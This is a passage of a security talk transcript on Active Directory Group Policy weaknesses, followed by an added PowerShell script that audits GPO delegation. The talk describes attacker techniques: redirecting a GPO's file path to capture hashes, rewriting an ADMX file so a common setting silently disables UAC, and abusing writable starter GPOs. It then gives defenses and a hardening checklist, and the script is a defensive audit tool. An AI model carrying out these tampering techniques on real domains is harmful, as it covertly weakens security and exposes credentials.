because there were certain circumstances where you were only getting the computer hashes but that could be valuable as well so the point is you know there's other things that you can do with this besides just you know faking setting storage so it's really important to be able to control who can write to that GPC in this scenario now doing this the downside to this is if you're if you're an attacker doing this and the admin tries to go in and edit the gpo that you've redirected or report against it it will just barf all over the place Microsoft doesn't know what to do with it so that's a pretty telltale sign that something's wrong this this next one I just wrote about

this it's a little bit of it's kind of out there but I thought it was worth documenting so admin template settings use something called admx files admx files define the text that you see in the GP editor under admin templates and behind the scenes what registry keys and values they write to most shops have something called a central store the central store is just a folder in sysvol where all where you keep all of your admx files and everyone using gpmc and GP editor in the domain will use that copy of admx files it's a centralized version control system if you will for admx because admx files change with every new release of Windows at

Microsoft comes out with so that's kind of the authoritative source if I have write access to the central store I can go into it go into an admin admx file and change the underlying registry key and value for a particular policy now that in and of itself is not terribly interesting because in order for that to take effect an admin would have to come in and set that value after I made that change so the chances of that are small of course I I had recommended it if you were gonna try to do this as an attacker that you pick a setting that many shops implement and I did that here in an example that I have where I took this

setting here always wait for the network at computer startup and logon which I don't know there's it's got a period one of the most common settings I've seen in Group Policy land and I took the set the snippet of a DMX file that implements that so it tells it what registry key and value - right - and I modified it and I said well actually if they if they enable that setting what I really want you to do is disable UAC and the text description in GP editor doesn't change because that's coming from a different file that's not that's the language independent file called the 80ml file but if they hit this and say enabled I

said okay set enable Lua which is the UAC registry key for enabling UAC set it to zero turn it off so suddenly UAC gets turned off on that Jeep and any problem any clients that process that GPO so again there's some caveats in terms of leveraging this because you have to wait for the admin you really have to be patient you have to wait for the admin to edit and create a you know use this setting in a GPO but nonetheless it's completely hidden you'll never find as an admin you probably won't find it until it's too late and there are other things you can do with this as well I picked an obvious one weak write permissions on starter

GPOs this one this one was kind of a low-hanging fruit thing I don't know very many shops that use starter GPOs there were this kind of aborted idea that Microsoft had around creating GPO templates they never really took it very far today it exists - essentially you can use it to create a template of admin template settings and then you can create a new GPO from it well just like there's issues with weak write permissions on regular GPOs starter GPOs have the same problem if I can write to a starter GPO and write some arbitrary setting in there that may be weakened security in the environment like I can write Windows Firewall settings into registry Paul then if somebody creates a

new GPO from that starter GPO then all bets are off all right I want to talk a little bit about defense before I run out of time so as it may be obvious to you there's probably a couple different things that you can do from a reconnaissance perspective this first ones a little tongue-in-cheek but it's actually not a bad way to go if you're using group policy today for security hardening stomp use something else there's other technologies out there for pushing security configuration to Windows the second one is more measured I would say which is to reduce the visibility of GPOs responsible for security so don't give the attacker a road map to your security posture if you

have GPOs that implements security hardening standards take away authenticated users read from the security filtering on that GPO at the very least targeted to domain computers what does that do it means that users because authenticated users remember includes both computer accounts and user accounts if you're not using authenticated users you're just using domain computers then only computer accounts can read the policy and admins of course but a regular user cannot I have to stop let me just talk quickly about hardening checklist check who can write to GPOs who can write GPO links who can write to the central store are the G PC and GPT permissions consistent do parent folders and containers in those to grant child rights that are

disparate or separate from your GPO delegation I've seen that happen a lot of times an external path permissions should match the reference GPOs sorry for that last-minute flurry but hopefully that was useful thank you I don't know I guess we don't have any time for questions or any if you have any questions thank you very much Darren you
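The hardening checklist the talk closes with (who can write to GPOs, who can write GPO links, who can write to the central store, whether the GPC and GPT agree, and which external paths a GPO references), together with a check for the gPCFileSysPath redirection described earlier, as an added PowerShell example. This is not Darren Mar-Elia's code and not part of PowerView or Grouper2. It assumes the RSAT GroupPolicy and ActiveDirectory modules on a domain-joined host, an account that can read GPO delegation, container ACLs and SYSVOL, and a list of principals expected to hold write rights (an assumption; adjust it to your own delegation model). The function names Get-GpoDelegationFindings and Test-TrustedWriter are the example's own.

```powershell
# Added example for the talk's hardening checklist; not the speaker's code and not
# part of PowerView or Grouper2. Assumes RSAT GroupPolicy + ActiveDirectory modules
# on a domain-joined host with read access to GPOs, container ACLs and SYSVOL.
Import-Module GroupPolicy
Import-Module ActiveDirectory

# schemaIDGUIDs of the two attributes that carry GPO links on a container
$script:GpLinkGuid    = [guid]'f30e3bbe-9ff0-11d1-b603-0000f80367c1'   # gPLink
$script:GpOptionsGuid = [guid]'f30e3bbf-9ff0-11d1-b603-0000f80367c1'   # gPOptions

# Assumption: the only principals expected to hold write rights on GPOs, link
# attributes and the central store. Extend this to match your delegation model.
$script:TrustedWriters = 'Domain Admins','Enterprise Admins','Administrators','SYSTEM','CREATOR OWNER'

function Test-TrustedWriter([string]$Trustee) {
    # compare on the account name only, dropping a "DOMAIN\" or "NT AUTHORITY\" prefix
    $script:TrustedWriters -contains ($Trustee -split '\\')[-1]
}

function Get-GpoDelegationFindings {
    $domain   = Get-ADDomain
    $sysvol   = "\\$($domain.DNSRoot)\SYSVOL\$($domain.DNSRoot)"
    $findings = New-Object System.Collections.Generic.List[string]

    foreach ($gpo in Get-GPO -All) {
        $label = "GPO '$($gpo.DisplayName)'"

        # 1. Who can write to the GPO? GPMC delegation covers GPC and GPT together.
        foreach ($perm in Get-GPPermission -Guid $gpo.Id -All) {
            if ($perm.Permission.ToString() -in 'GpoEdit','GpoEditDeleteModifySecurity' -and
                -not (Test-TrustedWriter $perm.Trustee.Name)) {
                $findings.Add("$label: $($perm.Trustee.Name) has $($perm.Permission)")
            }
        }

        # 2. GPT redirection: gPCFileSysPath should point into this domain's SYSVOL.
        #    (A path written with a DC host name instead of the domain name is reported too.)
        $gpc = Get-ADObject -Identity $gpo.Path -Properties gPCFileSysPath
        if ($gpc.gPCFileSysPath -notlike "$sysvol\Policies\*") {
            $findings.Add("$label: gPCFileSysPath points to $($gpc.gPCFileSysPath)")
        }

        # 3. GPC/GPT version mismatch: a GPT edited without bumping the AD version number.
        foreach ($side in 'User','Computer') {
            $ds = $gpo.$side.DSVersion; $sv = $gpo.$side.SysvolVersion
            if ($ds -ne $sv) { $findings.Add("$label: $side AD version $ds but SYSVOL version $sv") }
        }

        # 4. External paths: UNC references in the GPT outside SYSVOL/NETLOGON need
        #    the same ACL review as the GPO itself.
        if (Test-Path -LiteralPath $gpc.gPCFileSysPath) {
            Get-ChildItem -LiteralPath $gpc.gPCFileSysPath -Recurse -Include *.xml,*.ini,*.inf -File |
                Select-String -Pattern '\\\\[^\\\s"<>]+\\[^\\\s"<>]+' -AllMatches |
                ForEach-Object { $_.Matches.Value } | Sort-Object -Unique |
                Where-Object { $_ -notmatch '^\\\\[^\\]+\\(SYSVOL|NETLOGON)(\\|$)' } |
                ForEach-Object { $findings.Add("$label: references external path $_") }
        }
    }

    # 5. Who can write gPLink/gPOptions on the domain head and every OU?
    $containers = @($domain.DistinguishedName) +
        @(Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName)
    $writeProp = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
    foreach ($dn in $containers) {
        foreach ($ace in (Get-Acl -Path "AD:\$dn").Access) {
            # explicit Allow ACEs only; inherited ones are reported where they are defined
            if ($ace.AccessControlType -ne 'Allow' -or $ace.IsInherited) { continue }
            # GenericAll and GenericWrite both include the WriteProperty bit
            if (([int]($ace.ActiveDirectoryRights -band $writeProp)) -eq 0) { continue }
            # ObjectType Empty means "all properties", which includes gPLink
            if ($ace.ObjectType -notin $script:GpLinkGuid, $script:GpOptionsGuid, [guid]::Empty) { continue }
            if (-not (Test-TrustedWriter $ace.IdentityReference.Value)) {
                $findings.Add("Container $dn`: $($ace.IdentityReference.Value) can write gPLink/gPOptions")
            }
        }
    }

    # 6. Central store: write access here lets someone rewire what an ADMX setting does.
    #    Only the WriteData bit is tested; unmapped generic rights on an ACE are not detected.
    $store = Join-Path $sysvol 'Policies\PolicyDefinitions'
    if (Test-Path -LiteralPath $store) {
        $writeData = [System.Security.AccessControl.FileSystemRights]::WriteData
        foreach ($ace in (Get-Acl -LiteralPath $store).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                ([int]($ace.FileSystemRights -band $writeData)) -ne 0 -and
                -not (Test-TrustedWriter $ace.IdentityReference.Value)) {
                $findings.Add("Central store: $($ace.IdentityReference.Value) has $($ace.FileSystemRights)")
            }
        }
    }

    return $findings
}

Get-GpoDelegationFindings | ForEach-Object { Write-Output $_ }
```

Run it from a domain-joined management host; every line it prints is one item from the checklist to review, not a confirmed compromise, since delegated GPO editors and custom link delegations are legitimate in many environments and only need to be on the trusted list. The script reports write rights only; it does not follow WriteDacl or WriteOwner, and it does not check the ACLs of the external servers it lists, which is the follow-up the talk asks for.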